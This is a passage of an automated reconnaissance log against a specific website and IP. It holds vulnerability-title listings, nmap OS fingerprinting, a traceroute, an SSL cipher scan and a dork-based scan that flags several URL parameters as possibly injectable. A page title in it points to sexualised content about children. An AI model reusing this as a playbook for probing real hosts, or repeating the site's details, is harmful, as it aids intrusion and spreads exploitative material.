16212| [2733] Apache HTTP Server mod_rewrite Local Overflow
16213| [2672] Apache HTTP Server mod_ssl SSLCipherSuite Ciphersuite Downgrade Weakness
16214| [2613] Apache HTTP Server mod_cgi stderr Output Handling Local DoS
16215| [2149] Apache::Gallery Privilege Escalation
16216| [2107] Apache HTTP Server mod_ssl Host: Header XSS
16217| [1926] Apache HTTP Server mod_rewrite Crafted URI Rule Bypass
16218| [1833] Apache HTTP Server Multiple Slash GET Request DoS
16219| [1577] Apache HTTP Server mod_rewrite RewriteRule Expansion Arbitrary File Access
16220| [872] Apache Tomcat Multiple Default Accounts
16221| [862] Apache HTTP Server SSI Error Page XSS
16222| [859] Apache HTTP Server Win32 Crafted Traversal Arbitrary File Access
16223| [849] Apache Tomcat TroubleShooter Servlet Information Disclosure
16224| [845] Apache Tomcat MSDOS Device XSS
16225| [844] Apache Tomcat Java Servlet Error Page XSS
16226| [842] Apache HTTP Server mod_ssl ssl_compat_directive Function Overflow
16227| [838] Apache HTTP Server Chunked Encoding Remote Overflow
16228| [827] PHP4 for Apache on Windows php.exe Malformed Request Path Disclosure
16229| [775] Apache mod_python Module Importing Privilege Function Execution
16230| [769] Apache HTTP Server Win32 DOS Batch File Arbitrary Command Execution
16231| [756] Apache HTTP Server mod_ssl i2d_SSL_SESSION Function SSL Client Certificate Overflow
16232| [701] Apache HTTP Server Win32 ScriptAlias php.exe Arbitrary File Access
16233| [674] Apache Tomcat Nonexistent File Error Message Path Disclosure
16234| [637] Apache HTTP Server UserDir Directive Username Enumeration
16235| [623] mod_auth_pgsql for Apache HTTP Server User Name SQL Injection
16236| [582] Apache HTTP Server Multiviews Feature Arbitrary Directory Listing
16237| [562] Apache HTTP Server mod_info /server-info Information Disclosure
16238| [561] Apache Web Servers mod_status /server-status Information Disclosure
16239| [417] Apache HTTP Server on SuSE Linux /doc/packages Remote Information Disclosure
16240| [410] mod_perl for Apache HTTP Server /perl/ Directory Listing
16241| [404] Apache HTTP Server on SuSE Linux WebDAV PROPFIND Arbitrary Directory Listing
16242| [402] Apache HTTP Server on SuSE Linux cgi-bin-sdb Request Script Source Disclosure
16243| [379] Apache ASP module Apache::ASP source.asp Example File Arbitrary File Creation
16244| [377] Apache Tomcat Snoop Servlet Remote Information Disclosure
16245| [376] Apache Tomcat contextAdmin Arbitrary File Access
16246| [342] Apache HTTP Server for Windows Multiple Forward Slash Directory Listing
16247| [222] Apache HTTP Server test-cgi Arbitrary File Access
16248| [143] Apache HTTP Server printenv.pl Multiple Method CGI XSS
16249| [48] Apache HTTP Server on Debian /usr/doc Directory Information Disclosure
16250|_
16251Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
16252Device type: general purpose|broadband router|WAP|webcam
16253Running (JUST GUESSING): Linux 2.6.X|3.X|2.4.X (95%), Asus embedded (94%), AXIS embedded (94%)
16254OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/h:asus:rt-ac66u cpe:/h:asus:rt-n10 cpe:/h:axis:211_network_camera cpe:/o:linux:linux_kernel:2.6.20 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:3.8
16255Aggressive OS guesses: Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.9 (95%), Linux 3.0 - 3.1 (94%), Asus RT-AC66U router (Linux 2.6) (94%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (94%), Linux 2.6.18 (94%), Asus RT-N16 WAP (Linux 2.6) (94%), Asus RT-N66U WAP (Linux 2.6) (94%), Tomato 1.28 (Linux 2.6.22) (94%), AXIS 211A Network Camera (Linux 2.6.20) (94%)
16256No exact OS matches for host (test conditions non-ideal).
16257Uptime guess: 30.015 days (since Fri Sep 6 00:04:24 2019)
16258Network Distance: 14 hops
16259TCP Sequence Prediction: Difficulty=263 (Good luck!)
16260IP ID Sequence Generation: All zeros
16261
16262TRACEROUTE (using port 443/tcp)
16263HOP RTT ADDRESS
162641 45.71 ms 10.246.204.1
162652 48.13 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
162663 31.50 ms irb-0.agg1.qc1.ca.m247.com (37.120.128.168)
162674 30.60 ms te-1-5-2-0.bb1.fra2.de.m247.com (82.102.29.44)
162685 46.28 ms te0-0-0-3.rcr21.ymq02.atlas.cogentco.com (38.104.155.233)
162696 63.01 ms be2090.ccr22.ymq01.atlas.cogentco.com (154.54.45.117)
162707 121.22 ms be3042.ccr21.lpl01.atlas.cogentco.com (154.54.44.161)
162718 139.32 ms be2182.ccr41.ams03.atlas.cogentco.com (154.54.77.245)
162729 139.36 ms be3434.rcr21.ams06.atlas.cogentco.com (154.54.59.50)
1627310 139.43 ms worldstream.demarc.cogentco.com (149.14.93.114)
1627411 139.55 ms 109.236.95.179
1627512 139.54 ms 190.2.158.153
1627613 139.46 ms 185.106.120.66
1627714 139.70 ms latina.petite.guru (185.82.200.52)
16278
16279NSE: Script Post-scanning.
16280Initiating NSE at 00:26
16281Completed NSE at 00:26, 0.00s elapsed
16282Initiating NSE at 00:26
16283Completed NSE at 00:26, 0.00s elapsed
16284######################################################################################################################################
16285https://www.ygmt.info [200 OK] Apache[2.4.10], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[185.82.200.52], Script[JavaScript], Title[Books, videos, photos, fiction and non-fiction of and about young girls under 16 preteen models], X-UA-Compatible[IE=edge]
16286######################################################################################################################################
16287Version: 1.11.13-static
16288OpenSSL 1.0.2-chacha (1.0.2g-dev)
16289
16290Connected to 185.82.200.52
16291
16292Testing SSL server www.ygmt.info on port 443 using SNI name www.ygmt.info
16293
16294 TLS Fallback SCSV:
16295Server supports TLS Fallback SCSV
16296
16297 TLS renegotiation:
16298Secure session renegotiation supported
16299
16300 TLS Compression:
16301Compression disabled
16302
16303 Heartbleed:
16304TLS 1.2 not vulnerable to heartbleed
16305TLS 1.1 not vulnerable to heartbleed
16306TLS 1.0 not vulnerable to heartbleed
16307
16308 Supported Server Cipher(s):
16309Preferred TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
16310Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
16311Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
16312Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
16313Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
16314Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
16315Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
16316Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
16317Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
16318Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
16319Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
16320Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
16321Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
16322Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
16323Accepted TLSv1.2 256 bits CAMELLIA256-SHA
16324Accepted TLSv1.2 256 bits AES256-SHA
16325Accepted TLSv1.2 128 bits CAMELLIA128-SHA
16326Accepted TLSv1.2 128 bits AES128-SHA
16327Preferred TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
16328Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
16329Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
16330Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
16331Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
16332Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
16333Accepted TLSv1.1 256 bits CAMELLIA256-SHA
16334Accepted TLSv1.1 256 bits AES256-SHA
16335Accepted TLSv1.1 128 bits CAMELLIA128-SHA
16336Accepted TLSv1.1 128 bits AES128-SHA
16337Preferred TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
16338Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
16339Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
16340Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
16341Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
16342Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
16343Accepted TLSv1.0 256 bits CAMELLIA256-SHA
16344Accepted TLSv1.0 256 bits AES256-SHA
16345Accepted TLSv1.0 128 bits CAMELLIA128-SHA
16346Accepted TLSv1.0 128 bits AES128-SHA
16347
16348 SSL Certificate:
16349Signature Algorithm: sha256WithRSAEncryption
16350RSA Key Strength: 2048
16351
16352Subject: ygmt.info
16353Altnames: DNS:ygmt.info, DNS:www.ygmt.info
16354Issuer: COMODO RSA Domain Validation Secure Server CA
16355
16356Not valid before: Feb 14 00:00:00 2017 GMT
16357Not valid after: Feb 14 23:59:59 2018 GMT
16358######################################################################################################################################
16359------------------------------------------------------------------------------------------------------------------------
16360
16361[ ! ] Starting SCANNER INURLBR 2.1 at [06-10-2019 00:27:04]
16362[ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
16363It is the end user's responsibility to obey all applicable local, state and federal laws.
16364Developers assume no liability and are not responsible for any misuse or damage caused by this program
16365
16366[ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/www.ygmt.info/output/inurlbr-www.ygmt.info ]
16367[ INFO ][ DORK ]::[ site:www.ygmt.info ]
16368[ INFO ][ SEARCHING ]:: {
16369[ INFO ][ ENGINE ]::[ GOOGLE - www.google.gm ]
16370
16371[ INFO ][ SEARCHING ]::
16373[ INFO ][ ENGINE ]::[ GOOGLE API ]
16374
16375[ INFO ][ SEARCHING ]::
16377[ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.mu ID: 003917828085772992913:gmoeray5sa8 ]
16378
16379[ INFO ][ SEARCHING ]::
16381
16382[ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
16383
16384
16385 _[ - ]::--------------------------------------------------------------------------------------------------------------
16386|_[ + ] [ 0 / 100 ]-[00:27:16] [ - ]
16387|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats ]
16388|_[ + ] Exploit::
16389|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16390|_[ + ] More details:: / - / , ISP:
16391|_[ + ] Found:: UNIDENTIFIED
16392
16393 _[ - ]::--------------------------------------------------------------------------------------------------------------
16394|_[ + ] [ 1 / 100 ]-[00:27:17] [ - ]
16395|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?cat=Free Sites ]
16396|_[ + ] Exploit::
16397|_[ + ] Information Server:: HTTP/1.1 400 Bad Request, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16398|_[ + ] More details:: / - / , ISP:
16399|_[ + ] Found:: UNIDENTIFIED
16400
16401 _[ - ]::--------------------------------------------------------------------------------------------------------------
16402|_[ + ] [ 2 / 100 ]-[00:27:18] [ - ]
16403|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=68 ]
16404|_[ + ] Exploit::
16405|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16406|_[ + ] More details:: / - / , ISP:
16407|_[ + ] Found:: UNIDENTIFIED
16408
16409 _[ - ]::--------------------------------------------------------------------------------------------------------------
16410|_[ + ] [ 3 / 100 ]-[00:27:18] [ - ]
16411|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=40 ]
16412|_[ + ] Exploit::
16413|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16414|_[ + ] More details:: / - / , ISP:
16415|_[ + ] Found:: UNIDENTIFIED
16416
16417 _[ - ]::--------------------------------------------------------------------------------------------------------------
16418|_[ + ] [ 4 / 100 ]-[00:27:19] [ - ]
16419|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=38 ]
16420|_[ + ] Exploit::
16421|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16422|_[ + ] More details:: / - / , ISP:
16423|_[ + ] Found:: UNIDENTIFIED
16424
16425 _[ - ]::--------------------------------------------------------------------------------------------------------------
16426|_[ + ] [ 5 / 100 ]-[00:27:20] [ - ]
16427|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=108 ]
16428|_[ + ] Exploit::
16429|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16430|_[ + ] More details:: / - / , ISP:
16431|_[ + ] Found:: UNIDENTIFIED
16432
16433 _[ - ]::--------------------------------------------------------------------------------------------------------------
16434|_[ + ] [ 6 / 100 ]-[00:27:20] [ - ]
16435|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=63 ]
16436|_[ + ] Exploit::
16437|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16438|_[ + ] More details:: / - / , ISP:
16439|_[ + ] Found:: UNIDENTIFIED
16440
16441 _[ - ]::--------------------------------------------------------------------------------------------------------------
16442|_[ + ] [ 7 / 100 ]-[00:27:21] [ - ]
16443|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=93 ]
16444|_[ + ] Exploit::
16445|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16446|_[ + ] More details:: / - / , ISP:
16447|_[ + ] Found:: UNIDENTIFIED
16448
16449 _[ - ]::--------------------------------------------------------------------------------------------------------------
16450|_[ + ] [ 8 / 100 ]-[00:27:22] [ - ]
16451|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=92 ]
16452|_[ + ] Exploit::
16453|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16454|_[ + ] More details:: / - / , ISP:
16455|_[ + ] Found:: UNIDENTIFIED
16456
16457 _[ - ]::--------------------------------------------------------------------------------------------------------------
16458|_[ + ] [ 9 / 100 ]-[00:27:22] [ - ]
16459|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=1 ]
16460|_[ + ] Exploit::
16461|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16462|_[ + ] More details:: / - / , ISP:
16463|_[ + ] Found:: UNIDENTIFIED
16464
16465 _[ - ]::--------------------------------------------------------------------------------------------------------------
16466|_[ + ] [ 10 / 100 ]-[00:27:23] [ - ]
16467|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=37 ]
16468|_[ + ] Exploit::
16469|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16470|_[ + ] More details:: / - / , ISP:
16471|_[ + ] Found:: UNIDENTIFIED
16472
16473 _[ - ]::--------------------------------------------------------------------------------------------------------------
16474|_[ + ] [ 11 / 100 ]-[00:27:23] [ ! ]
16475|_[ + ] Target:: [ ( POTENTIALLY VULNERABLE ) http://www.ygmt.info/top50/index.php?a=stats&u=107 ]
16476|_[ + ] Exploit::
16477|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16478|_[ + ] More details:: / - / , ISP:
16479|_[ + ] Found:: ORACLE-03 - VALUE: ORA-
16480|_[ + ] VALUE SAVED IN THE FILE:: inurlbr-www.ygmt.info
16481
16482 _[ - ]::--------------------------------------------------------------------------------------------------------------
16483|_[ + ] [ 12 / 100 ]-[00:27:24] [ - ]
16484|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=5 ]
16485|_[ + ] Exploit::
16486|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16487|_[ + ] More details:: / - / , ISP:
16488|_[ + ] Found:: UNIDENTIFIED
16489
16490 _[ - ]::--------------------------------------------------------------------------------------------------------------
16491|_[ + ] [ 13 / 100 ]-[00:27:25] [ - ]
16492|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=2 ]
16493|_[ + ] Exploit::
16494|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16495|_[ + ] More details:: / - / , ISP:
16496|_[ + ] Found:: UNIDENTIFIED
16497
16498 _[ - ]::--------------------------------------------------------------------------------------------------------------
16499|_[ + ] [ 14 / 100 ]-[00:27:25] [ - ]
16500|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=15 ]
16501|_[ + ] Exploit::
16502|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16503|_[ + ] More details:: / - / , ISP:
16504|_[ + ] Found:: UNIDENTIFIED
16505
16506 _[ - ]::--------------------------------------------------------------------------------------------------------------
16507|_[ + ] [ 15 / 100 ]-[00:27:26] [ - ]
16508|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=95 ]
16509|_[ + ] Exploit::
16510|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16511|_[ + ] More details:: / - / , ISP:
16512|_[ + ] Found:: UNIDENTIFIED
16513
16514 _[ - ]::--------------------------------------------------------------------------------------------------------------
16515|_[ + ] [ 16 / 100 ]-[00:27:27] [ - ]
16516|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=29 ]
16517|_[ + ] Exploit::
16518|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16519|_[ + ] More details:: / - / , ISP:
16520|_[ + ] Found:: UNIDENTIFIED
16521
16522 _[ - ]::--------------------------------------------------------------------------------------------------------------
16523|_[ + ] [ 17 / 100 ]-[00:27:27] [ - ]
16524|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=46 ]
16525|_[ + ] Exploit::
16526|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16527|_[ + ] More details:: / - / , ISP:
16528|_[ + ] Found:: UNIDENTIFIED
16529
16530 _[ - ]::--------------------------------------------------------------------------------------------------------------
16531|_[ + ] [ 18 / 100 ]-[00:27:28] [ - ]
16532|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=66 ]
16533|_[ + ] Exploit::
16534|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16535|_[ + ] More details:: / - / , ISP:
16536|_[ + ] Found:: UNIDENTIFIED
16537
16538 _[ - ]::--------------------------------------------------------------------------------------------------------------
16539|_[ + ] [ 19 / 100 ]-[00:27:29] [ - ]
16540|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=50 ]
16541|_[ + ] Exploit::
16542|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16543|_[ + ] More details:: / - / , ISP:
16544|_[ + ] Found:: UNIDENTIFIED
16545
16546 _[ - ]::--------------------------------------------------------------------------------------------------------------
16547|_[ + ] [ 20 / 100 ]-[00:27:30] [ - ]
16548|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=39 ]
16549|_[ + ] Exploit::
16550|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16551|_[ + ] More details:: / - / , ISP:
16552|_[ + ] Found:: UNIDENTIFIED
16553
16554 _[ - ]::--------------------------------------------------------------------------------------------------------------
16555|_[ + ] [ 21 / 100 ]-[00:27:30] [ - ]
16556|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=22 ]
16557|_[ + ] Exploit::
16558|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16559|_[ + ] More details:: / - / , ISP:
16560|_[ + ] Found:: UNIDENTIFIED
16561
16562 _[ - ]::--------------------------------------------------------------------------------------------------------------
16563|_[ + ] [ 22 / 100 ]-[00:27:31] [ - ]
16564|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=75 ]
16565|_[ + ] Exploit::
16566|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16567|_[ + ] More details:: / - / , ISP:
16568|_[ + ] Found:: UNIDENTIFIED
16569
16570 _[ - ]::--------------------------------------------------------------------------------------------------------------
16571|_[ + ] [ 23 / 100 ]-[00:27:32] [ - ]
16572|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=31 ]
16573|_[ + ] Exploit::
16574|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16575|_[ + ] More details:: / - / , ISP:
16576|_[ + ] Found:: UNIDENTIFIED
16577
16578 _[ - ]::--------------------------------------------------------------------------------------------------------------
16579|_[ + ] [ 24 / 100 ]-[00:27:33] [ - ]
16580|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=61 ]
16581|_[ + ] Exploit::
16582|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16583|_[ + ] More details:: / - / , ISP:
16584|_[ + ] Found:: UNIDENTIFIED
16585
16586 _[ - ]::--------------------------------------------------------------------------------------------------------------
16587|_[ + ] [ 25 / 100 ]-[00:27:33] [ - ]
16588|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=64 ]
16589|_[ + ] Exploit::
16590|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16591|_[ + ] More details:: / - / , ISP:
16592|_[ + ] Found:: UNIDENTIFIED
16593
16594 _[ - ]::--------------------------------------------------------------------------------------------------------------
16595|_[ + ] [ 26 / 100 ]-[00:27:34] [ ! ]
16596|_[ + ] Target:: [ ( POTENTIALLY VULNERABLE ) http://www.ygmt.info/top50/index.php?a=stats&u=83 ]
16597|_[ + ] Exploit::
16598|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16599|_[ + ] More details:: / - / , ISP:
16600|_[ + ] Found:: ORACLE-03 - VALUE: ORA-
16601|_[ + ] VALUE SAVED IN THE FILE:: inurlbr-www.ygmt.info
16602
16603 _[ - ]::--------------------------------------------------------------------------------------------------------------
16604|_[ + ] [ 27 / 100 ]-[00:27:35] [ - ]
16605|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=58 ]
16606|_[ + ] Exploit::
16607|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16608|_[ + ] More details:: / - / , ISP:
16609|_[ + ] Found:: UNIDENTIFIED
16610
16611 _[ - ]::--------------------------------------------------------------------------------------------------------------
16612|_[ + ] [ 28 / 100 ]-[00:27:36] [ - ]
16613|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=76 ]
16614|_[ + ] Exploit::
16615|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16616|_[ + ] More details:: / - / , ISP:
16617|_[ + ] Found:: UNIDENTIFIED
16618
16619 _[ - ]::--------------------------------------------------------------------------------------------------------------
16620|_[ + ] [ 29 / 100 ]-[00:27:36] [ - ]
16621|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=3 ]
16622|_[ + ] Exploit::
16623|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16624|_[ + ] More details:: / - / , ISP:
16625|_[ + ] Found:: UNIDENTIFIED
16626
16627 _[ - ]::--------------------------------------------------------------------------------------------------------------
16628|_[ + ] [ 30 / 100 ]-[00:27:37] [ - ]
16629|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=21 ]
16630|_[ + ] Exploit::
16631|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16632|_[ + ] More details:: / - / , ISP:
16633|_[ + ] Found:: UNIDENTIFIED
16634
16635 _[ - ]::--------------------------------------------------------------------------------------------------------------
16636|_[ + ] [ 31 / 100 ]-[00:27:38] [ ! ]
16637|_[ + ] Target:: [ ( POTENTIALLY VULNERABLE ) http://www.ygmt.info/top50/index.php?a=stats&u=34 ]
16638|_[ + ] Exploit::
16639|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16640|_[ + ] More details:: / - / , ISP:
16641|_[ + ] Found:: ORACLE-03 - VALUE: ORA-
16642|_[ + ] VALUE SAVED IN THE FILE:: inurlbr-www.ygmt.info
16643
16644 _[ - ]::--------------------------------------------------------------------------------------------------------------
16645|_[ + ] [ 32 / 100 ]-[00:27:39] [ - ]
16646|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=49 ]
16647|_[ + ] Exploit::
16648|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16649|_[ + ] More details:: / - / , ISP:
16650|_[ + ] Found:: UNIDENTIFIED
16651
16652 _[ - ]::--------------------------------------------------------------------------------------------------------------
16653|_[ + ] [ 33 / 100 ]-[00:27:39] [ - ]
16654|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=6 ]
16655|_[ + ] Exploit::
16656|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16657|_[ + ] More details:: / - / , ISP:
16658|_[ + ] Found:: UNIDENTIFIED
16659
16660 _[ - ]::--------------------------------------------------------------------------------------------------------------
16661|_[ + ] [ 34 / 100 ]-[00:27:40] [ - ]
16662|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=51 ]
16663|_[ + ] Exploit::
16664|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16665|_[ + ] More details:: / - / , ISP:
16666|_[ + ] Found:: UNIDENTIFIED
16667
16668 _[ - ]::--------------------------------------------------------------------------------------------------------------
16669|_[ + ] [ 35 / 100 ]-[00:27:41] [ - ]
16670|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=33 ]
16671|_[ + ] Exploit::
16672|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16673|_[ + ] More details:: / - / , ISP:
16674|_[ + ] Found:: UNIDENTIFIED
16675
16676 _[ - ]::--------------------------------------------------------------------------------------------------------------
16677|_[ + ] [ 36 / 100 ]-[00:27:41] [ - ]
16678|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=86 ]
16679|_[ + ] Exploit::
16680|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16681|_[ + ] More details:: / - / , ISP:
16682|_[ + ] Found:: UNIDENTIFIED
16683
16684 _[ - ]::--------------------------------------------------------------------------------------------------------------
16685|_[ + ] [ 37 / 100 ]-[00:27:42] [ - ]
16686|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=30 ]
16687|_[ + ] Exploit::
16688|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16689|_[ + ] More details:: / - / , ISP:
16690|_[ + ] Found:: UNIDENTIFIED
16691
16692 _[ - ]::--------------------------------------------------------------------------------------------------------------
16693|_[ + ] [ 38 / 100 ]-[00:27:43] [ - ]
16694|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=43 ]
16695|_[ + ] Exploit::
16696|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16697|_[ + ] More details:: / - / , ISP:
16698|_[ + ] Found:: UNIDENTIFIED
16699
16700 _[ - ]::--------------------------------------------------------------------------------------------------------------
16701|_[ + ] [ 39 / 100 ]-[00:27:43] [ - ]
16702|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=88 ]
16703|_[ + ] Exploit::
16704|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
16705|_[ + ] More details:: / - / , ISP:
16706|_[ + ] Found:: UNIDENTIFIED
16707
16708 _[ - ]::--------------------------------------------------------------------------------------------------------------
16709|_[ + ] [ 40 / 100 ]-[00:27:44] [ - ]
